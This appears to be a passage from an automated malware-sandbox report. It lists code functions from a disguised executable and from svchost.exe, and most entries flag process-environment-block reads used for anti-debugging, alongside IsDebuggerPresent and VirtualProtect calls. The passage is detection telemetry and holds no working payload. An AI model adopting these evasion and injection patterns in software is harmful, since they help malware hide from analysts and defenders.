            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007446D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0084B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_04D734B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_04D73510 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_04D71E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03350310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033FA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03328397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0335438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0334E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033DE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033DE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033EC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0333A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B63C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03334260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03336259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033EA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B8243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B8243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03360124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033DA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03370185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033F60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]1_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]1_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]1_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]1_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]1_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]1_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]1_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]1_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]1_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]1_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]1_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]1_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]1_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]1_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]1_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]1_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]1_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]1_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]1_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]1_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]1_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]1_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]1_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]1_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]1_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]1_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]1_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]1_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]1_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]1_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]1_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]1_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]1_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]1_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]1_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]1_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]1_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]1_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]1_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033644B0 mov ecx, dword ptr fs:[00000030h]1_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033BA4B0 mov eax, dword ptr fs:[00000030h]1_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033364AB mov eax, dword ptr fs:[00000030h]1_2_033364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033EA49A mov eax, dword ptr fs:[00000030h]1_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033304E5 mov ecx, dword ptr fs:[00000030h]1_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0335EB20 mov eax, dword ptr fs:[00000030h]1_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033F8B28 mov eax, dword ptr fs:[00000030h]1_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03402B57 mov eax, dword ptr fs:[00000030h]1_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033AEB1D mov eax, dword ptr fs:[00000030h]1_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0332CB7E mov eax, dword ptr fs:[00000030h]1_2_0332CB7E
